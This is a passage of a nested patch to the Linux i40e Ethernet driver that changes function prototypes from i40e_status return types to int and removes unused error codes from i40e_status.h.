+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free);
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free);
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free);
+ 
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
+ 			      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
++		     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
+ 				  struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+ 		     u8 mib_type, void *buff, u16 buff_size,
+ 		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				      struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+ 		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-			      bool persist,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
+-				       bool dcb_enable,
+-				       struct i40e_asq_cmd_details
+-				       *cmd_details);
+-i40e_status i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++int i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
++		      bool persist,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_dcb_parameters(struct i40e_hw *hw,
++			       bool dcb_enable,
++			       struct i40e_asq_cmd_details
++			       *cmd_details);
++int i40e_aq_start_lldp(struct i40e_hw *hw, bool persist,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
++			       void *buff, u16 buff_size,
+ 			       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_cee_dcb_config(struct i40e_hw *hw,
+-				       void *buff, u16 buff_size,
+-				       struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
+-				u16 udp_port, u8 protocol_index,
+-				u8 *filter_index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
++int i40e_aq_add_udp_tunnel(struct i40e_hw *hw,
++			   u16 udp_port, u8 protocol_index,
++			   u8 *filter_index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_del_udp_tunnel(struct i40e_hw *hw, u8 index,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_delete_element(struct i40e_hw *hw, u16 seid,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_bw_limit(struct i40e_hw *hw,
+ 				u16 seid, u16 credit, u8 max_credit,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_dcb_updated(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
+-				u16 seid, u16 credit, u8 max_bw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
+-			struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++int i40e_aq_dcb_updated(struct i40e_hw *hw,
+ 			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
+-		enum i40e_admin_queue_opc opcode,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
++int i40e_aq_config_switch_comp_bw_limit(struct i40e_hw *hw,
++					u16 seid, u16 credit, u8 max_bw,
++					struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_vsi_tc_bw(struct i40e_hw *hw, u16 seid,
++			     struct i40e_aqc_configure_vsi_tc_bw_data *bw_data,
++			     struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_config_switch_comp_ets(struct i40e_hw *hw,
++			       u16 seid,
++			       struct i40e_aqc_configure_switching_comp_ets_data *ets_data,
++			       enum i40e_admin_queue_opc opcode,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_config_switch_comp_bw_config(struct i40e_hw *hw,
+ 	u16 seid,
+ 	struct i40e_aqc_configure_switching_comp_bw_config_data *bw_data,
+ 	struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
+-			u16 seid,
+-			struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_port_ets_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_port_ets_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
+-		u16 seid,
+-		struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
+-		struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_resume_port_tx(struct i40e_hw *hw,
+-				   struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int i40e_aq_query_vsi_bw_config(struct i40e_hw *hw,
++				u16 seid,
++				struct i40e_aqc_query_vsi_bw_config_resp *bw_data,
++				struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_vsi_ets_sla_config(struct i40e_hw *hw,
++				 u16 seid,
++				 struct i40e_aqc_query_vsi_ets_sla_config_resp *bw_data,
++				 struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_switch_comp_ets_config(struct i40e_hw *hw,
++				     u16 seid,
++				     struct i40e_aqc_query_switching_comp_ets_config_resp *bw_data,
++				     struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_port_ets_config(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_aqc_query_port_ets_config_resp *bw_data,
++			      struct i40e_asq_cmd_details *cmd_details);
++int
++i40e_aq_query_switch_comp_bw_config(struct i40e_hw *hw,
++				    u16 seid,
++				    struct i40e_aqc_query_switching_comp_bw_config_resp *bw_data,
++				    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_resume_port_tx(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count);
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 vsi,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count);
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 vsi,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count);
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count);
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg);
+-enum i40e_status_code
++int i40e_read_lldp_cfg(struct i40e_hw *hw,
++		       struct i40e_lldp_variables *lldp_cfg);
++int
+ i40e_aq_suspend_port_tx(struct i40e_hw *hw, u16 seid,
+ 			struct i40e_asq_cmd_details *cmd_details);
+ /* i40e_common */
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw);
+-i40e_status i40e_pf_reset(struct i40e_hw *hw);
++int i40e_init_shared_code(struct i40e_hw *hw);
++int i40e_pf_reset(struct i40e_hw *hw);
+ void i40e_clear_hw(struct i40e_hw *hw);
+ void i40e_clear_pxe_mode(struct i40e_hw *hw);
+-i40e_status i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
+-i40e_status i40e_update_link_info(struct i40e_hw *hw);
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
+-				      u32 *max_bw, u32 *min_bw, bool *min_valid,
+-				      bool *max_valid);
+-i40e_status i40e_aq_configure_partition_bw(struct i40e_hw *hw,
+-			struct i40e_aqc_configure_partition_bw_data *bw_data,
+-			struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size);
+-i40e_status i40e_validate_mac_addr(u8 *mac_addr);
++int i40e_get_link_status(struct i40e_hw *hw, bool *link_up);
++int i40e_update_link_info(struct i40e_hw *hw);
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_bw_from_alt_ram(struct i40e_hw *hw,
++			      u32 *max_bw, u32 *min_bw, bool *min_valid,
++			      bool *max_valid);
++int
++i40e_aq_configure_partition_bw(struct i40e_hw *hw,
++			       struct i40e_aqc_configure_partition_bw_data *bw_data,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr);
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
++			 u32 pba_num_size);
++int i40e_validate_mac_addr(u8 *mac_addr);
+ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable);
+ /* prototype for functions used for NVM access */
+-i40e_status i40e_init_nvm(struct i40e_hw *hw);
+-i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
+-				      enum i40e_aq_resource_access_type access);
++int i40e_init_nvm(struct i40e_hw *hw);
++int i40e_acquire_nvm(struct i40e_hw *hw,
++		     enum i40e_aq_resource_access_type access);
+ void i40e_release_nvm(struct i40e_hw *hw);
+-i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
+-					 u16 *data);
+-enum i40e_status_code i40e_read_nvm_module_data(struct i40e_hw *hw,
+-						u8 module_ptr,
+-						u16 module_offset,
+-						u16 data_offset,
+-						u16 words_data_size,
+-						u16 *data_ptr);
+-i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
+-				 u16 *words, u16 *data);
+-i40e_status i40e_update_nvm_checksum(struct i40e_hw *hw);
+-i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
+-						 u16 *checksum);
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *);
++int i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
++		       u16 *data);
++int i40e_read_nvm_module_data(struct i40e_hw *hw,
++			      u8 module_ptr,
++			      u16 module_offset,
++			      u16 data_offset,
++			      u16 words_data_size,
++			      u16 *data_ptr);
++int i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
++			 u16 *words, u16 *data);
++int i40e_update_nvm_checksum(struct i40e_hw *hw);
++int i40e_validate_nvm_checksum(struct i40e_hw *hw,
++			       u16 *checksum);
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *errno);
+ void i40e_nvmupd_check_wait_event(struct i40e_hw *hw, u16 opcode,
+ 				  struct i40e_aq_desc *desc);
+ void i40e_nvmupd_clear_wait_state(struct i40e_hw *hw);
+ void i40e_set_pci_config_data(struct i40e_hw *hw, u16 link_status);
+ 
+-i40e_status i40e_set_mac_type(struct i40e_hw *hw);
++int i40e_set_mac_type(struct i40e_hw *hw);
+ 
+ extern struct i40e_rx_ptype_decoded i40e_ptype_lookup[];
+ 
+@@ -422,41 +427,41 @@ i40e_virtchnl_link_speed(enum i40e_aq_link_speed link_speed)
+ /* i40e_common for VF drivers*/
+ void i40e_vf_parse_hw_config(struct i40e_hw *hw,
+ 			     struct virtchnl_vf_resource *msg);
+-i40e_status i40e_vf_reset(struct i40e_hw *hw);
+-i40e_status i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
+-				enum virtchnl_ops v_opcode,
+-				i40e_status v_retval,
+-				u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_set_filter_control(struct i40e_hw *hw,
+-				struct i40e_filter_control_settings *settings);
+-i40e_status i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
+-				u8 *mac_addr, u16 ethtype, u16 flags,
+-				u16 vsi_seid, u16 queue, bool is_add,
+-				struct i40e_control_filter_stats *stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
+-			       u8 table_id, u32 start_index, u16 buff_size,
+-			       void *buff, u16 *ret_buff_size,
+-			       u8 *ret_next_table, u32 *ret_next_index,
+-			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_vf_reset(struct i40e_hw *hw);
++int i40e_aq_send_msg_to_pf(struct i40e_hw *hw,
++			   enum virtchnl_ops v_opcode,
++			   int v_retval,
++			   u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_filter_control(struct i40e_hw *hw,
++			    struct i40e_filter_control_settings *settings);
++int i40e_aq_add_rem_control_packet_filter(struct i40e_hw *hw,
++					  u8 *mac_addr, u16 ethtype, u16 flags,
++					  u16 vsi_seid, u16 queue, bool is_add,
++					  struct i40e_control_filter_stats *stats,
++					  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_dump(struct i40e_hw *hw, u8 cluster_id,
++		       u8 table_id, u32 start_index, u16 buff_size,
++		       void *buff, u16 *ret_buff_size,
++		       u8 *ret_next_table, u32 *ret_next_index,
++		       struct i40e_asq_cmd_details *cmd_details);
+ void i40e_add_filter_to_drop_tx_flow_control_frames(struct i40e_hw *hw,
+ 						    u16 vsi_seid);
+-i40e_status i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 *reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_read_register(struct i40e_hw *hw,
++				 u32 reg_addr, u32 *reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
+ u32 i40e_read_rx_ctl(struct i40e_hw *hw, u32 reg_addr);
+-i40e_status i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
+-				u32 reg_addr, u32 reg_val,
+-				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rx_ctl_write_register(struct i40e_hw *hw,
++				  u32 reg_addr, u32 reg_val,
++				  struct i40e_asq_cmd_details *cmd_details);
+ void i40e_write_rx_ctl(struct i40e_hw *hw, u32 reg_addr, u32 reg_val);
+-enum i40e_status_code
++int
+ i40e_aq_set_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+ 			     u32 reg_addr, u32 reg_val,
+ 			     struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int
+ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ 			     u8 phy_select, u8 dev_addr, bool page_change,
+ 			     bool set_mdio, u8 mdio_num,
+@@ -469,43 +474,43 @@ i40e_aq_get_phy_register_ext(struct i40e_hw *hw,
+ #define i40e_aq_get_phy_register(hw, ps, da, pc, ra, rv, cd)		\
+ 	i40e_aq_get_phy_register_ext(hw, ps, da, pc, false, 0, ra, rv, cd)
+ 
+-i40e_status i40e_read_phy_register_clause22(struct i40e_hw *hw,
+-					    u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause22(struct i40e_hw *hw,
+-					     u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register_clause45(struct i40e_hw *hw,
+-				u8 page, u16 reg, u8 phy_addr, u16 value);
+-i40e_status i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				   u8 phy_addr, u16 *value);
+-i40e_status i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
+-				    u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause22(struct i40e_hw *hw,
++				    u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause22(struct i40e_hw *hw,
++				     u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register_clause45(struct i40e_hw *hw,
++				    u8 page, u16 reg, u8 phy_addr, u16 *value);
++int i40e_write_phy_register_clause45(struct i40e_hw *hw,
++				     u8 page, u16 reg, u8 phy_addr, u16 value);
++int i40e_read_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			   u8 phy_addr, u16 *value);
++int i40e_write_phy_register(struct i40e_hw *hw, u8 page, u16 reg,
++			    u8 phy_addr, u16 value);
+ u8 i40e_get_phy_address(struct i40e_hw *hw, u8 dev_num);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
+-i40e_status i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
+-			      u16 buff_size, u32 track_id,
+-			      u32 *error_offset, u32 *error_info,
+-			      struct i40e_asq_cmd_details *
+-			      cmd_details);
+-i40e_status i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
+-				 u16 buff_size, u8 flags,
+-				 struct i40e_asq_cmd_details *
+-				 cmd_details);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
++int i40e_aq_write_ddp(struct i40e_hw *hw, void *buff,
++		      u16 buff_size, u32 track_id,
++		      u32 *error_offset, u32 *error_info,
++		      struct i40e_asq_cmd_details *
++		      cmd_details);
++int i40e_aq_get_ddp_list(struct i40e_hw *hw, void *buff,
++			 u16 buff_size, u8 flags,
++			 struct i40e_asq_cmd_details *
++			 cmd_details);
+ struct i40e_generic_seg_header *
+ i40e_find_segment_in_package(u32 segment_type,
+ 			     struct i40e_package_header *pkg_header);
+ struct i40e_profile_section_header *
+ i40e_find_section_in_profile(u32 section_type,
+ 			     struct i40e_profile_segment *profile);
+-enum i40e_status_code
++int
+ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		   u32 track_id);
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *i40e_seg,
+ 		      u32 track_id);
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id);
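[Editorial aside, not part of the patch: besides rewriting every prototype above from i40e_status to int, the i40e_prototype.h hunk drops the i40e_stat_str() declaration, which is why the debug and dev_err call sites elsewhere in this patch switch from "%s" to "%d". A hedged sketch of that logging change follows; log_aq_err() and aq_str() are hypothetical stand-ins for the touched i40e_debug()/dev_err() sites and for i40e_aq_str(), which the patch keeps.]

	/* Editorial sketch of the logging change: with i40e_stat_str()
	 * gone, the raw int status is printed via "%d" instead of being
	 * resolved to a name via "%s".
	 */
	#include <stdio.h>

	static const char *aq_str(int aq_rc)
	{
		/* stand-in for i40e_aq_str(), retained by the patch */
		return aq_rc ? "I40E_AQ_RC_EBUSY" : "OK";
	}

	static void log_aq_err(int status, int aq_rc)
	{
		/* before: "... err %s ...", i40e_stat_str(hw, status) */
		/* after:  "... err %d ...", status                     */
		printf("nvmupd err %d aq_err %s\n", status, aq_str(aq_rc));
	}

	int main(void)
	{
		log_aq_err(-1, 1);
		return 0;
	}
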
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_status.h b/drivers/net/ethernet/intel/i40e/i40e_status.h
+index db3714a65dc71..4d2782e76038b 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_status.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_status.h
+@@ -9,65 +9,30 @@ enum i40e_status_code {
+ 	I40E_SUCCESS				= 0,
+ 	I40E_ERR_NVM				= -1,
+ 	I40E_ERR_NVM_CHECKSUM			= -2,
+-	I40E_ERR_PHY				= -3,
+ 	I40E_ERR_CONFIG				= -4,
+ 	I40E_ERR_PARAM				= -5,
+-	I40E_ERR_MAC_TYPE			= -6,
+ 	I40E_ERR_UNKNOWN_PHY			= -7,
+-	I40E_ERR_LINK_SETUP			= -8,
+-	I40E_ERR_ADAPTER_STOPPED		= -9,
+ 	I40E_ERR_INVALID_MAC_ADDR		= -10,
+ 	I40E_ERR_DEVICE_NOT_SUPPORTED		= -11,
+-	I40E_ERR_PRIMARY_REQUESTS_PENDING	= -12,
+-	I40E_ERR_INVALID_LINK_SETTINGS		= -13,
+-	I40E_ERR_AUTONEG_NOT_COMPLETE		= -14,
+ 	I40E_ERR_RESET_FAILED			= -15,
+-	I40E_ERR_SWFW_SYNC			= -16,
+ 	I40E_ERR_NO_AVAILABLE_VSI		= -17,
+ 	I40E_ERR_NO_MEMORY			= -18,
+ 	I40E_ERR_BAD_PTR			= -19,
+-	I40E_ERR_RING_FULL			= -20,
+-	I40E_ERR_INVALID_PD_ID			= -21,
+-	I40E_ERR_INVALID_QP_ID			= -22,
+-	I40E_ERR_INVALID_CQ_ID			= -23,
+-	I40E_ERR_INVALID_CEQ_ID			= -24,
+-	I40E_ERR_INVALID_AEQ_ID			= -25,
+ 	I40E_ERR_INVALID_SIZE			= -26,
+-	I40E_ERR_INVALID_ARP_INDEX		= -27,
+-	I40E_ERR_INVALID_FPM_FUNC_ID		= -28,
+-	I40E_ERR_QP_INVALID_MSG_SIZE		= -29,
+-	I40E_ERR_QP_TOOMANY_WRS_POSTED		= -30,
+-	I40E_ERR_INVALID_FRAG_COUNT		= -31,
+ 	I40E_ERR_QUEUE_EMPTY			= -32,
+-	I40E_ERR_INVALID_ALIGNMENT		= -33,
+-	I40E_ERR_FLUSHED_QUEUE			= -34,
+-	I40E_ERR_INVALID_PUSH_PAGE_INDEX	= -35,
+-	I40E_ERR_INVALID_IMM_DATA_SIZE		= -36,
+ 	I40E_ERR_TIMEOUT			= -37,
+-	I40E_ERR_OPCODE_MISMATCH		= -38,
+-	I40E_ERR_CQP_COMPL_ERROR		= -39,
+-	I40E_ERR_INVALID_VF_ID			= -40,
+-	I40E_ERR_INVALID_HMCFN_ID		= -41,
+-	I40E_ERR_BACKING_PAGE_ERROR		= -42,
+-	I40E_ERR_NO_PBLCHUNKS_AVAILABLE		= -43,
+-	I40E_ERR_INVALID_PBLE_INDEX		= -44,
+ 	I40E_ERR_INVALID_SD_INDEX		= -45,
+ 	I40E_ERR_INVALID_PAGE_DESC_INDEX	= -46,
+ 	I40E_ERR_INVALID_SD_TYPE		= -47,
+-	I40E_ERR_MEMCPY_FAILED			= -48,
+ 	I40E_ERR_INVALID_HMC_OBJ_INDEX		= -49,
+ 	I40E_ERR_INVALID_HMC_OBJ_COUNT		= -50,
+-	I40E_ERR_INVALID_SRQ_ARM_LIMIT		= -51,
+-	I40E_ERR_SRQ_ENABLED			= -52,
+ 	I40E_ERR_ADMIN_QUEUE_ERROR		= -53,
+ 	I40E_ERR_ADMIN_QUEUE_TIMEOUT		= -54,
+ 	I40E_ERR_BUF_TOO_SHORT			= -55,
+ 	I40E_ERR_ADMIN_QUEUE_FULL		= -56,
+ 	I40E_ERR_ADMIN_QUEUE_NO_WORK		= -57,
+-	I40E_ERR_BAD_IWARP_CQE			= -58,
+ 	I40E_ERR_NVM_BLANK_MODE			= -59,
+ 	I40E_ERR_NOT_IMPLEMENTED		= -60,
+-	I40E_ERR_PE_DOORBELL_NOT_ENABLED	= -61,
+ 	I40E_ERR_DIAG_TEST_FAILED		= -62,
+ 	I40E_ERR_NOT_READY			= -63,
+ 	I40E_NOT_SUPPORTED			= -64,
